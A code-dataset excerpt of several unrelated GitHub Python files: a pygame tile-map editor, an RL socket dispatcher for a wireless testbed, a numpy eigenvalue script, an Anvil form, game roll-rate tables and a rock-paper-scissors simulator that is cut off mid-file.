map1.addTileType(\"crackedbrick.75\",TileType(\"sprite_sheet.png\",(1,9),tileCollides=False ))\n map1.addTileType(\"crackedbrick.50\",TileType(\"sprite_sheet.png\",(1,10),tileCollides=False ))\n map1.addTileType(\"crackedbrick.25\",TileType(\"sprite_sheet.png\",(1,11),tileCollides=False ))\n\n map1.addTileType(\"brick_back\",TileType(\"sprite_sheet.png\",(2,8),tileCollides=False,isBack=True))\n map1.addTileType(\"brick.100\",TileType(\"sprite_sheet.png\",(2,8)))\n map1.addTileType(\"brick.75\",TileType(\"sprite_sheet.png\",(2,9),tileCollides=False ))\n map1.addTileType(\"brick.50\",TileType(\"sprite_sheet.png\",(2,10),tileCollides=False ))\n map1.addTileType(\"brick.25\",TileType(\"sprite_sheet.png\",(2,11),tileCollides=False ))\n\n 
map1.addTileType(\"netherbrick_back\",TileType(\"sprite_sheet.png\",(3,8),tileCollides=False,isBack=True))\n map1.addTileType(\"netherbrick.100\",TileType(\"sprite_sheet.png\",(3,8)))\n map1.addTileType(\"netherbrick.75\",TileType(\"sprite_sheet.png\",(3,9),tileCollides=False ))\n map1.addTileType(\"netherbrick.50\",TileType(\"sprite_sheet.png\",(3,10),tileCollides=False ))\n map1.addTileType(\"netherbrick.25\",TileType(\"sprite_sheet.png\",(3,11),tileCollides=False ))\n\n map1.addTileType(\"netherack_back\",TileType(\"sprite_sheet.png\",(0,12),tileCollides=False,isBack=True))\n map1.addTileType(\"netherack.100\",TileType(\"sprite_sheet.png\",(0,12)))\n map1.addTileType(\"netherack.75\",TileType(\"sprite_sheet.png\",(0,13),tileCollides=False ))\n map1.addTileType(\"netherack.50\",TileType(\"sprite_sheet.png\",(0,14),tileCollides=False ))\n map1.addTileType(\"netherack.25\",TileType(\"sprite_sheet.png\",(0,15),tileCollides=False ))\n\n map1.addTileType(\"soulsand.100\",TileType(\"sprite_sheet.png\",(1,12)))\n map1.addTileType(\"soulsand.75\",TileType(\"sprite_sheet.png\",(1,13),tileCollides=False ))\n map1.addTileType(\"soulsand.50\",TileType(\"sprite_sheet.png\",(1,14),tileCollides=False ))\n map1.addTileType(\"soulsand.25\",TileType(\"sprite_sheet.png\",(1,15),tileCollides=False ))\n\n\n map1.addTileType(\"torch\",TileType(\"sprite_sheet.png\",(4,4),tileCollides=False,isBack=True))\n map1.addTileType(\"toadstool\",TileType(\"sprite_sheet.png\",(4,5),tileCollides=False,isBack=True))\n map1.addTileType(\"mushroom\",TileType(\"sprite_sheet.png\",(4,6),tileCollides=False,isBack=True))\n map1.addTileType(\"flowerRed\",TileType(\"sprite_sheet.png\",(4,7),tileCollides=False,isBack=True))\n map1.addTileType(\"shrooms\",TileType(\"sprite_sheet.png\",(4,8),tileCollides=False,isBack=True))\n map1.addTileType(\"metalbars\",TileType(\"sprite_sheet.png\",(4,9),tileCollides=False,isBack=True))\n map1.addTileType(\"web\",TileType(\"sprite_sheet.png\",(4,11),tileCollides=False,isBack=True))\n map1.addTileType(\"tall_grass\",TileType(\"sprite_sheet.png\",(4,12),tileCollides=False,isBack=True))\n map1.addTileType(\"flowerYellow\",TileType(\"sprite_sheet.png\",(4,13),tileCollides=False,isBack=True))\n map1.addTileType(\"glowstone\",TileType(\"sprite_sheet.png\",(4,14),tileCollides=False,isBack=True))\n map1.addTileType(\"bookshelf\",TileType(\"sprite_sheet.png\",(4,15),tileCollides=False,isBack=True))\n\n\n map1.addTileType(\"trapGrass\",TileType(\"sprite_sheet.png\",(0,0))) #game 0,0\n map1.addTileType(\"trapGrassTripped\",TileType(\"sprite_sheet.png\",(2,0),tileCollides=False))\n map1.addTileType(\"trapStone\",TileType(\"sprite_sheet.png\",(0,4))) #game 0,4\n map1.addTileType(\"trapStoneTripped\",TileType(\"sprite_sheet.png\",(2,1),tileCollides=False))\n map1.addTileType(\"trapStoneBrick\",TileType(\"sprite_sheet.png\",(2,8))) #game 3,8\n map1.addTileType(\"trapStoneBrickTripped\",TileType(\"sprite_sheet.png\",(2,2),tileCollides=False))\n map1.addTileType(\"trapNetherBrick\",TileType(\"sprite_sheet.png\",(3,8))) #game 3,8\n map1.addTileType(\"trapNetherBrickTripped\",TileType(\"sprite_sheet.png\",(2,3),tileCollides=False))\n map1.addTileType(\"trapNether\",TileType(\"sprite_sheet.png\",(0,12))) #game 0,12\n map1.addTileType(\"trapNetherTripped\",TileType(\"sprite_sheet.png\",(2,4),tileCollides=False))\n map1.addTileType(\"trapObsidian\",TileType(\"sprite_sheet.png\",(3,6))) #game 3,6\n map1.addTileType(\"trapObsidianTripped\",TileType(\"sprite_sheet.png\",(2,5),tileCollides=False))\n\n\n\n 
map1.addTileType(\"nodigMetal\",TileType(\"sprite_sheet.png\",(3,2)))\n map1.addTileType(\"nodigCoal\",TileType(\"sprite_sheet.png\",(3,3)))\n map1.addTileType(\"nodigGold\",TileType(\"sprite_sheet.png\",(3,4)))\n map1.addTileType(\"nodigDiamond\",TileType(\"sprite_sheet.png\",(3,5)))\n map1.addTileType(\"nodigObsidian\",TileType(\"sprite_sheet.png\",(3,6)))\n map1.addTileType(\"nodigBedrock\",TileType(\"sprite_sheet.png\",(3,7)))\n map1.addTileType(\"iron\",TileType(\"sprite_sheet.png\",(3,2),tileCollides=False,isBack=True))\n map1.addTileType(\"coal\",TileType(\"sprite_sheet.png\",(3,3),tileCollides=False,isBack=True))\n map1.addTileType(\"goldore\",TileType(\"sprite_sheet.png\",(3,4),tileCollides=False,isBack=True))\n map1.addTileType(\"diamond\",TileType(\"sprite_sheet.png\",(3,5),tileCollides=False,isBack=True))\n map1.addTileType(\"obsidian\",TileType(\"sprite_sheet.png\",(3,6),tileCollides=False,isBack=True))\n map1.addTileType(\"bedrock\",TileType(\"sprite_sheet.png\",(3,7),tileCollides=False,isBack=True))\n\n map1.addTileType(\"ladder\",TileType(\"sprite_sheet.png\",(3,1)))\n map1.addTileType(\"escapeLadder\",TileType(\"sprite_sheet.png\",(3,1)))\n\n map1.addTileType(\"water\",TileType(\"sprite_sheet.png\",(4,0)))\n map1.addTileType(\"lava.1\",TileType(\"sprite_sheet.png\",(5,12)))\n map1.addTileType(\"lava.2\",TileType(\"sprite_sheet.png\",(5,13)))\n map1.addTileType(\"lava.3\",TileType(\"sprite_sheet.png\",(5,14)))\n map1.addTileType(\"lava.4\",TileType(\"sprite_sheet.png\",(5,15)))\n\n map1.addTileType(\"beam\",TileType(\"sprite_sheet.png\",(3,0)))\n map1.addTileType(\"gold\",TileType(\"sprite_sheet.png\",(4,1),tileCollides=False))\n map1.addTileType(\"enemy spawn\",TileType(\"sprite_sheet.png\",(4,2),tileCollides=False,isVisible=False))\n map1.addTileType(\"player spawn\",TileType(\"sprite_sheet.png\",(4,3),tileCollides=False,isVisible=False))\n\n map1.addTileType(\"air\",TileType(\"sprite_sheet.png\", (0,0), tileCollides=False,isVisible=False))\n\n clock = pygame.time.Clock()\n\n curTileKey=\"grass.100\"\n\n while True:\n pygame.event.pump()\n keysPressed = pygame.key.get_pressed()\n if keysPressed[pygame.K_ESCAPE]:\n break\n if keysPressed[pygame.K_s] and (keysPressed[pygame.K_RCTRL] or keysPressed[pygame.K_LCTRL]):\n map1.saveMap(current_map)\n map1.saveTileTypes(\"maptiles.txt\")\n print(\"Saved\")\n while keysPressed[pygame.K_s] and (keysPressed[pygame.K_RCTRL] or keysPressed[pygame.K_LCTRL]):\n pygame.event.pump()\n keysPressed = pygame.key.get_pressed()\n\n if keysPressed[pygame.K_l] and (keysPressed[pygame.K_RCTRL] or keysPressed[pygame.K_LCTRL]):\n map1.loadMap(current_map)\n map1.loadTileTypes(\"maptiles.txt\")\n print(\"Loaded\")\n while keysPressed[pygame.K_l] and (keysPressed[pygame.K_RCTRL] or keysPressed[pygame.K_LCTRL]):\n pygame.event.pump()\n keysPressed = pygame.key.get_pressed()\n\n if keysPressed[pygame.K_LEFT]:\n curTileKey=prevDictKey(map1.tileTypes,curTileKey)\n print(\"Current Tile:\",curTileKey)\n while keysPressed[pygame.K_LEFT]:\n pygame.event.pump()\n keysPressed = pygame.key.get_pressed()\n\n if keysPressed[pygame.K_RIGHT]:\n curTileKey=nextDictKey(map1.tileTypes,curTileKey)\n print(\"Current Tile:\",curTileKey)\n while keysPressed[pygame.K_RIGHT]:\n pygame.event.pump()\n keysPressed = pygame.key.get_pressed()\n\n\n (mx,my)=pygame.mouse.get_pos()\n (lb,mb,rb)=pygame.mouse.get_pressed()\n mouseCol=int(mx/map1.tileWidth)\n mouseRow=int(my/map1.tileHeight)\n if lb==True:\n map1.setTileMapEntry(mouseCol,mouseRow,curTileKey)\n if rb==True:\n 
map1.setTileMapEntry(mouseCol,mouseRow,None)\n\n screen.fill((0,5,25)) #clear screen\n\n map1.renderMap(screen)\n\n newSurf = map1.tileTypes[curTileKey].tileSurf.copy()\n newSurf.set_alpha(150)\n screen.blit(newSurf,(mouseCol*map1.tileWidth,mouseRow*map1.tileHeight))\n pygame.draw.rect(screen,(0,0,255),(mouseCol*map1.tileWidth,mouseRow*map1.tileHeight,map1.tileWidth,map1.tileHeight),2)\n\n pygame.draw.circle(screen,(255,50,50),(mx,my),40,1)\n\n collideTiles=map1.getCollisionSetCircle(mx,my,40)\n\n #show tiles that we're colliding with by drawing a line to each\n if len(collideTiles)>0:\n closestTile=collideTiles[0]\n for collideTile in collideTiles:\n if collideTile.collideDistance < closestTile.collideDistance:\n closestTile=collideTile\n\n pygame.draw.line(screen,(0,255,0),(mx,my),(collideTile.mapTileCenterX,collideTile.mapTileCenterY))\n pygame.draw.line(screen,(255,0,255),(mx,my),(closestTile.mapTileCenterX,closestTile.mapTileCenterY),3)\n\n pygame.display.flip()\n\n clock.tick(60)\n\n pygame.display.quit()\n","repo_name":"DaltonFox/Gold-Runner","sub_path":"PaulsEditor.py","file_name":"PaulsEditor.py","file_ext":"py","file_size_in_byte":24684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"25726648258","text":"import time\nimport socket\nimport select\nimport re\nimport threading\nimport io\nimport random\nimport pickle\nimport numpy as np\nimport gym_dimmer.envs.utils.glossai_utils as glossai_utils\nfrom gym_dimmer.envs.utils.TraceHandler import TraceHandler\nfrom gym_dimmer.envs.utils.TestbedHandler import TestbedHandler\n\n\nclass Dispatcher(threading.Thread):\n###############################################################################################################\n# Class functions \"\"\"\n###############################################################################################################\n def __init__(self,\n requested_testbed,\n use_traces = False,\n one_agent_per_node = False,\n use_randomized_order = False, # deprecated\n use_randomized_value_at_beginning_of_episode = False, # deprecated\n **kwargs):\n threading.Thread.__init__(self)\n # Dispatcher has been requested to shut down \n self.should_stop_main_loop = False\n # save inputs\n self.use_randomized_order = use_randomized_order\n self.use_randomized_value_at_beginning_of_episode = use_randomized_value_at_beginning_of_episode\n self.is_one_agent_per_node = one_agent_per_node\n self.use_traces = use_traces\n # testbed name, a string\n self.testbed_name = None\n # network representation, a TraceHandler or TestbedHandler\n self.network = None\n # Dispatcher has detected that the action is incorrect? 
i.e., the N value requested is not permitted\n self.incorrect_action = False\n # Counter to avoid desync\n self.desync_counter = 0\n # Dispatcher's interface for RL agents\n self.buffer_size = glossai_utils.DISPATCHER_BUFFER_SIZE\n self.dispatcher = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.dispatcher.settimeout(60.)\n self.dispatcher.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)\n self.dispatcher.setsockopt(socket.SOL_TCP, socket.TCP_NODELAY, 1)\n\n # Catch possible exceptions when reading traces or trying to get testbed's config\n try:\n self.testbed_name = requested_testbed\n if use_traces:\n self.network = TraceHandler(requested_testbed)\n else:\n self.network = TestbedHandler(requested_testbed)\n self.network.start()\n except Exception as e:\n glossai_utils.log_error(e)\n \n # Successfully selected traces or correct testbed\n glossai_utils.log_success(\"Dispatcher: {} selected: {}\".format(\"traces\" if use_traces else \"testbed\",\n requested_testbed))\n\n # Dispatcher.py: Check that trace/testbed selection has been carried\n assert self.testbed_name is not None and self.network is not None\n\n # Dispatcher's global view of N parameters of all nodes in the network\n self.N_value_for_nodes = [0]*self.network.nb_nodes # Actual N used by the node\n\n # RL agents are represented as socket clients\n self.RL_agents = None\n if one_agent_per_node:\n # if we have one RL algorithm per node in the network\n self.RL_agents = [None] * self.network.nb_nodes\n # allows switchiong between nodes if execution is one at a time\n self.agent_requested_reset = [False]*self.network.nb_nodes\n # used tp retrieve agent in list\n self.current_RL_agent_relative_id_in_order = -1\n # used to allow suffled order\n self.RL_agents_serving_order = np.array(range(len(self.RL_agents)))\n\n try:\n self.dispatcher.setblocking(glossai_utils.SOCKET_TIMEOUT_IN_SEC)\n self.dispatcher.bind((glossai_utils.DISPATCHER_ADDRESS, glossai_utils.DISPATCHER_PORT))\n self.dispatcher.listen()\n self.dispatcher.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)\n self.dispatcher.setsockopt(socket.SOL_TCP, socket.TCP_NODELAY, 1)\n glossai_utils.log_success(\"Dispatcher has started, available at {}:{}\".format(glossai_utils.DISPATCHER_ADDRESS, glossai_utils.DISPATCHER_PORT))\n except Exception as e:\n glossai_utils.log_error(\"Couldn't start the Dispatcher!\")\n glossai_utils.log_error(\"{}\".format(e))\n self.dispatcher.close()\n\n def stop(self):\n # Stop TestbedHandler\n self.network.stop()\n self.should_stop_main_loop = True\n\n\n###############################################################################################################\n# Helper functions\n###############################################################################################################\n\n \"\"\"Check the validity of N parameter\"\"\"\n def _verify_N_parameter(self, N):\n try:\n min_N = glossai_utils.MIN_INDIVIDUAL_N if self.is_one_agent_per_node else glossai_utils.MIN_COMMON_N \n if N < min_N:\n self.incorrect_action = True\n N = min_N\n elif N > glossai_utils.MAX_N:\n N = glossai_utils.MAX_N\n self.incorrect_action = True\n return N\n except Exception as e:\n print(e)\n self.should_stop_main_loop = True\n return glossai_utils.DEFAULT_N_COMMAND\n\n def _get_full_desynchronized_state(self, state):\n glossai_utils.log_error(\"DEPRECATED FUNCTION: _get_full_desynchronized_state\")\n for i in range(self.network.nb_nodes):\n state[i] = 1.\n state[self.network.nb_nodes+i] = -1.\n return state\n\n def 
_modify_state_to_include_desync(self, state):\n glossai_utils.log_error(\"DEPRECATED FUNCTION: _modify_state_to_include_desync\")\n for i in range(self.network.nb_nodes, 2*self.network.nb_nodes):\n if state[i] < 0.:\n state[i] = -1.\n state[i-self.network.nb_nodes] = 1.\n return state\n\n def _is_glossy_desynchronized(self, lowest_ratio_packet_received):\n #glossai_utils.log_error(\"DEPRECATED FUNCTION: _is_glossy_desynchronized\")\n if (lowest_ratio_packet_received < 0.5):\n glossai_utils.log_debug(\"Lowest received ratio: {}\".format(lowest_ratio_packet_received))\n return lowest_ratio_packet_received < 0.4\n\n def _check_possible_desync(self):\n #glossai_utils.log_warning(\"_check_possible_desync\")\n self.network.wait(glossai_utils.DESYNC_TEST_WAIT_IN_FLOODS)\n current_state, _, ratio_packets_received = self.network.read_state()\n ratio_packets_received = np.array(ratio_packets_received)\n return self._is_glossy_desynchronized(np.min(ratio_packets_received))\n\n \"\"\"Security to avoid Glossy desynchronization\"\"\"\n def _avoid_desync(self):\n if self._check_possible_desync():\n glossai_utils.log_warning(\"Reset Glossy and reboostrap!\")\n self.network.send_action([glossai_utils.DEFAULT_N_COMMAND]*self.network.nb_nodes)\n self.network.wait(glossai_utils.BOOTSTRAPPING_WAIT_IN_FLOODS) # allows bootstrapping and sync\n\n###############################################################################################################\n# RL agent Communication functions\n###############################################################################################################\n\n def _send_to_agent(self, agent, data):\n agent.send(pickle.dumps(data) + glossai_utils.DISPATCHER_COMMAND_SEPARATOR)\n\n def _accept_RL_agent_connection(self):\n try:\n (connection_socket, (client_address,client_port)) = self.dispatcher.accept()\n connection_socket.settimeout(glossai_utils.SOCKET_TIMEOUT_IN_SEC)\n connection_socket.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)\n glossai_utils.log_success(\"New RL agent ({}:{}) connecting to the system\".format(client_address, client_port))\n return connection_socket\n except Exception as e:\n glossai_utils.log_error(\"Couldn't accept RL agent as client\")\n glossai_utils.log_error(\"{}\".format(e))\n return None\n\n def _get_RL_agent_absolute_ID(self):\n if self.is_one_agent_per_node:\n return self.RL_agents_serving_order[self.current_RL_agent_relative_id_in_order]\n else:\n return 0\n\n def _get_next_RL_agent(self):\n # Reset counter to detect agent timeout\n self.RL_agent_timeout_counter = 0\n if self.is_one_agent_per_node:\n # get next RL agent\n self.current_RL_agent_relative_id_in_order +=1\n if self.current_RL_agent_relative_id_in_order >= len(self.RL_agents_serving_order):\n self.current_RL_agent_relative_id_in_order = 0\n # We can treat agents from 0..nb or use a shuffled order\n if self.use_randomized_order:\n np.random.shuffle(self.RL_agents_serving_order)\n return self.RL_agents[self._get_RL_agent_absolute_ID()]\n else:\n # only one RL agent in system\n return self.RL_agents\n\n def _get_RL_agent_requests(self, agent):\n try:\n # if one agent per node and node has requested reset last time, force a reset request\n if self.is_one_agent_per_node:\n if self.agent_requested_reset[self._get_RL_agent_absolute_ID()]:\n self.agent_requested_reset[self._get_RL_agent_absolute_ID()] = False\n return [pickle.dumps({\"request\":glossai_utils.RESET_REQUEST})]\n # Read from socket\n return 
agent.recv(self.buffer_size).split(glossai_utils.DISPATCHER_COMMAND_SEPARATOR)\n except Exception as e:\n self.should_stop_main_loop = True\n glossai_utils.log_error(\"Could not receive request from agent {}: {}\".format(agent,e))\n\n\n def _is_RL_agent_timeout(self): \n return self.RL_agent_timeout_counter >= glossai_utils.MULTIAGENT_MAXIMUM_TIMEOUT_FOR_AGENT_REQUEST\n\n def _execute_beginning_of_episode_computation(self):\n # Use a random N command value at the beginning of the episode?\n if self.use_randomized_value_at_beginning_of_episode:\n commands_for_glossy = [glossai_utils.KEEP_N_COMMAND]*self.network.nb_nodes\n commands_for_glossy[self._get_RL_agent_absolute_ID()] = np.random.randint(low=0, high=5)\n self.network.send_action(commands_for_glossy)\n###############################################################################################################\n# Request & Behaviour functions\n###############################################################################################################\n\n \"\"\"Execute the logic when a STATE request is received\"\"\"\n def _execute_state_request(self, agent, agentID = 0, should_check_desync = True):\n self.network.wait(glossai_utils.STATE_ACQUISITION_WAIT_IN_FLOODS)\n self.incorrect_action = False # todo remove\n state, current_n, ratio_packets_received = self.network.read_state(self.incorrect_action)\n self.incorrect_action = False\n # Save the lowest reliability during this observation\n self.lowest_ratio_received_packets = np.min(ratio_packets_received)\n\n # check we're not desync\n should_reset = False\n if should_check_desync:\n if self._is_glossy_desynchronized(self.lowest_ratio_received_packets):\n # reliability is low, check for a longer period of time to see if we are really desynchronizing\n if self._check_possible_desync():\n self.desync_counter += 1\n state = self._modify_state_to_include_desync(state)\n # if we believe we are desync, reset node N parameter to default and force next agent\n if self.desync_counter > 1: # at least two iterations were almost in desync\n glossai_utils.log_warning(\"Node {} caused a desync, reset command to default value\".format(agentID))\n should_reset = True\n commands_for_glossy = [glossai_utils.KEEP_N_COMMAND]*self.network.nb_nodes\n commands_for_glossy[agentID] = glossai_utils.DEFAULT_N_COMMAND\n self.network.send_action(commands_for_glossy)\n state = self._get_full_desynchronized_state(state)\n self.desync_counter = 0\n\n # send state to agent\n response = {\"state\": state, \"should_reset\": should_reset, \"this_agent_N\": current_n[agentID]}\n self._send_to_agent(agent, response)\n\n \"\"\"Execute the logic when a RESET request is received\"\"\"\n def _execute_reset_request(self, agent, agentID = 0):\n # Agent-env request a new episode some time ago, we need to read the current state\n self.network.wait(glossai_utils.STATE_ACQUISITION_WAIT_IN_FLOODS)\n # if we are using traces, we need to select a new subset of traces for the next episode\n if self.use_traces:\n self.network.request_reset()\n\n state, current_n, _ = self.network.read_state()\n # In a one env, all nodes share the same n\n response = {\"state\": state, \"this_agent_N\": current_n[agentID]}\n self._send_to_agent(agent, response)\n return True\n\n \"\"\"Execute the logic when a ACTION request is received, single-env case\"\"\"\n def _execute_action_request(self, requested_n, agent, agentID=0):\n # todo is the action incorrect?\n if self.incorrect_action:\n self.incorrect_action = True\n verified_n = 
self._verify_N_parameter(requested_n)\n #print(\"Dispatcher\", requested_n, verified_n)\n if self.is_one_agent_per_node:\n commands_for_glossy = [glossai_utils.KEEP_N_COMMAND]*self.network.nb_nodes\n commands_for_glossy[self._get_RL_agent_absolute_ID()] = verified_n\n else:\n commands_for_glossy = [verified_n]*self.network.nb_nodes\n self.network.send_action(commands_for_glossy)\n\n def _execute_end_of_episode_computation(self):\n self._avoid_desync()\n\n def _execute_request(self, current_RL_agent, agentID, request, done_serving_this_RL_agent):\n if request[\"request\"] == glossai_utils.STATE_REQUEST:\n #print(\"state\")\n self._execute_state_request(current_RL_agent, agentID, should_check_desync = False)\n elif request[\"request\"] == glossai_utils.RESET_REQUEST:\n #print(\"reset\")\n done_serving_this_RL_agent |= self._execute_reset_request(current_RL_agent, agentID)\n elif request[\"request\"] == glossai_utils.ACTION_REQUEST:\n #print(\"action\")\n self._execute_action_request(request[\"value\"], current_RL_agent, agentID)\n else:\n glossai_utils.log_warning(\"Non recognized request: {}, ({})\".format(request[\"request\"],\n request))\n return done_serving_this_RL_agent\n\n\n###############################################################################################################\n# Main loop\n###############################################################################################################\n\n def run(self):\n # Wait for RL agents connection\n if self.is_one_agent_per_node:\n for i in range(0,self.network.nb_nodes):\n self.RL_agents[i] = self._accept_RL_agent_connection()\n glossai_utils.log_success(\"RL Agent mapped to node {}\".format(i))\n else:\n self.RL_agents = self._accept_RL_agent_connection()\n glossai_utils.log_info(\"Dispatcher: Starting service loop.\")\n\n # WHILE TRUE\n while not self.should_stop_main_loop:\n done_serving_this_RL_agent = False\n\n # get next RL agent to serve\n current_RL_agent = self._get_next_RL_agent()\n # Check if we need to update the N value of this node to a random value for learning\n self._execute_beginning_of_episode_computation()\n\n # Serve this RL agent until end of episode or if agent has timeout\n while not done_serving_this_RL_agent and not self._is_RL_agent_timeout() and not self.should_stop_main_loop:\n # Read all requests received by this RL agent\n #t0 = time.time()\n packed_requests_list = self._get_RL_agent_requests(current_RL_agent)\n if packed_requests_list:\n for packed_request in packed_requests_list:\n t1 = time.time()\n # Avoid empty elements or timeout agent\n if packed_request ==b'':\n self.RL_agent_timeout_counter +=1\n continue\n self.RL_agent_timeout_counter = 0\n # Unpack request\n request = pickle.loads(packed_request)\n # Switch request type\n done_serving_this_RL_agent |= self._execute_request(current_RL_agent,\n self._get_RL_agent_absolute_ID(),\n request,\n done_serving_this_RL_agent)\n # glossai_utils.log_debug(\"request {} executed in {} ns\".format(request[\"request\"], (time.time()-t1)*1000000))\n #glossai_utils.log_debug(\"All requests in {} ns\".format((time.time()-t0)*1000000))\n # Execute end of episode check - desync\n # TODO\n #self._execute_end_of_episode_computation()\n","repo_name":"ds-kiel/dimmer","sub_path":"gyms/dimmer/gym_dimmer/envs/utils/Dispatcher.py","file_name":"Dispatcher.py","file_ext":"py","file_size_in_byte":18020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"32365786211","text":"import 
numpy\nmatriz=numpy.array([[1,2,-1],\n [1,0,1],\n [4,-4,5]])\ndef Propio(mat,c):\n new=numpy.array([0,0,0])\n new[c]=1\n oldl=1\n newl=9999\n while numpy.abs(oldl-newl)>1e-18:\n old=new\n oldl=newl\n new=mat@old\n newl=new[c]/old[c]\n new=new/numpy.linalg.norm(new)\n return newl,new\ndef ProductoTensorial(vector,bector):\n T=numpy.zeros([vector.shape[0],bector.shape[0]])\n for i in range(len(vector)):\n for j in range(len(bector)):\n T[i,j]=vector[i]*bector[j]\n return T\ndef Propios(mat):\n triz=mat.copy()\n valores=numpy.zeros(mat.shape[0])\n vetores=numpy.zeros(mat.shape)\n for i in range(len(mat)):\n l, v=Propio(triz,i)\n valores[i]=l\n vetores[i]=v\n triz=triz-l*ProductoTensorial(v,v)\n return valores,vetores\nval,vec=Propios(matriz)\nval=val[len(val)-1]\nmatriz=matriz-(numpy.eye(3)*val)\ndef norma(vector):\n return numpy.sum(vector**2)**(1/2)\ndef func(vector):\n return norma(matriz@vector)\ndef derivada(f,r,h):\n return (f(r+h)-f(r-h))/(2*(norma(h)))\ndef gradiente(f,r,h):\n grad = numpy.array([0.0, 0.0, 0.0])\n for i in range(len(grad)):\n delta=numpy.zeros(grad.shape)\n delta[i]=h\n grad[i]=derivada(f,r,delta)\n return grad\ndef descenso(f,r):\n grad=numpy.zeros((3))\n dist=0.5\n while dist>1e-16:\n last=grad\n grad=gradiente(f,r,0.00001)\n grad=grad/norma(grad)\n if numpy.sum(last*grad)<0:\n dist/=2\n r-=dist*grad\n return r/norma(r)\nvec=descenso(func,numpy.array([1.0,0.0,0.0]))\nprint(\"El valor de estado base es:\")\nprint(val)\nprint(\"Su vector propio asociado es:\")\nprint(vec)","repo_name":"JuanDavidAnzolaAldana/Metodos1_JuanAnzola_AngelicaLopez","sub_path":"taller3/Algebra 10.py","file_name":"Algebra 10.py","file_ext":"py","file_size_in_byte":1716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"74002808572","text":"from ._anvil_designer import Form1Template\nfrom anvil import *\nimport anvil.server\n\nclass Form1(Form1Template):\n def __init__(self, **properties):\n # Set Form properties and Data Bindings.\n self.init_components(**properties)\n\n # Any code you write here will run before the form opens.\n\n def primary_color_1_click(self, **event_args):\n \"\"\"This method is called when the button is clicked\"\"\"\n query = anvil.server.call('query_generator', \n self.title.text,\n self.KQ.text)\n if query:\n self.result1.visible = True\n self.result1.text = query[0]\n self.result2.visible = True\n self.result2.text = query[1]\n self.result3.visible = True\n self.result3.text = query[2]\n","repo_name":"gpadam/interactive-query-design-app","sub_path":"client_code/Form1/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"31698795333","text":"\"\"\"\nMaps tiers to roll rates for all food items at that tier and lower.\n\"\"\"\n\n# Local application imports\nfrom gym_snape.game.utils import RollRate\nfrom gym_snape.game.food.tier1 import *\nfrom gym_snape.game.food.tier2 import *\nfrom gym_snape.game.food.tier3 import *\nfrom gym_snape.game.food.tier4 import *\nfrom gym_snape.game.food.tier5 import *\nfrom gym_snape.game.food.tier6 import *\n\nroll_rates = {\n 1: [\n RollRate(Apple, 0.5),\n RollRate(Honey, 0.5)\n ],\n 2: [\n RollRate(Apple, 0.2),\n RollRate(Honey, 0.2),\n RollRate(Cupcake, 0.2),\n RollRate(MeatBone, 0.2),\n RollRate(SleepingPill, 0.2)\n ],\n 3: [\n RollRate(Apple, 0.1),\n RollRate(Honey, 0.15),\n RollRate(Cupcake, 0.15),\n RollRate(MeatBone, 0.15),\n 
RollRate(SleepingPill, 0.15),\n RollRate(Garlic, 0.15),\n RollRate(SaladBowl, 0.15)\n ],\n 4: [\n RollRate(Apple, 0),\n RollRate(Honey, 0.05),\n RollRate(Cupcake, 0.05),\n RollRate(MeatBone, 0.15),\n RollRate(SleepingPill, 0.15),\n RollRate(Garlic, 0.15),\n RollRate(SaladBowl, 0.15),\n RollRate(CannedFood, 0.15),\n RollRate(Pear, 0.15)\n ],\n 5: [\n RollRate(Apple, 0),\n RollRate(Honey, 0),\n RollRate(Cupcake, 0),\n RollRate(MeatBone, 0.1),\n RollRate(SleepingPill, 0.1),\n RollRate(Garlic, 0.1),\n RollRate(SaladBowl, 0.1),\n RollRate(CannedFood, 0.12),\n RollRate(Pear, 0.12),\n RollRate(Chili, 0.12),\n RollRate(Chocolate, 0.12),\n RollRate(Sushi, 0.12)\n ],\n 6: [\n RollRate(Apple, 0),\n RollRate(Honey, 0),\n RollRate(Cupcake, 0),\n RollRate(MeatBone, 0),\n RollRate(SleepingPill, 0),\n RollRate(Garlic, 0.05),\n RollRate(SaladBowl, 0.05),\n RollRate(CannedFood, 0.1),\n RollRate(Pear, 0.1),\n RollRate(Chili, 0.1),\n RollRate(Chocolate, 0.1),\n RollRate(Sushi, 0.1),\n RollRate(Melon, 0.1),\n RollRate(Mushroom, 0.1),\n RollRate(Pizza, 0.1),\n RollRate(Steak, 0.1)\n ]\n}\n\nif __name__ == '__main__':\n \"\"\"Check that all roll rates are valid.\"\"\"\n # Lazy import since only need numpy for this test\n import numpy as np\n for i in sorted(roll_rates.keys()):\n food, rates = [], []\n for rr in roll_rates[i]:\n food.append(rr.item)\n rates.append(rr.rate)\n try:\n np.random.choice(food, p=rates, size=1)\n except:\n print(f'Could not sample from tier {i}')\n print(f'Summed to {np.sum(rates)}')\n","repo_name":"jasonjewik/gym-snape","sub_path":"gym-snape/gym_snape/game/food/roll_rates.py","file_name":"roll_rates.py","file_ext":"py","file_size_in_byte":2633,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"78"} +{"seq_id":"17725057715","text":"from random import sample\nfrom time import sleep\n\ndef _players_generator(rounds):\n rounds = rounds\n options = [\"R\", \"P\", \"S\"]\n for i in range(rounds):\n player1 = sample(options*rounds, rounds)\n player2 = sample(options*rounds, rounds)\n \n return player1, player2\n\ndef check_results(rounds):\n player1, player2 = _players_generator(rounds)\n\n player1_wins = 0\n player2_wins = 0\n n = 0\n\n while rounds != 0:\n results = [player1[n], player2[n]]\n print(f'Round {n+1}:')\n rounds -= 1\n n += 1\n\n #Tie cases\n if results[0] == \"S\" and results[1] == \"S\":\n print(\"TIE\\n\")\n elif results[0] == \"P\" and results[1] == \"P\":\n print(\"TIE\\n\")\n elif results[0] == \"R\" and results[1] == \"R\":\n print(\"TIE\\n\")\n \n #Player1 wins cases\n elif results[0] == \"S\" and results[1] == \"P\":\n print(\"Player 1 WINS this round\\n\")\n player1_wins += 1\n elif results[0] == \"R\" and results[1] == \"S\":\n 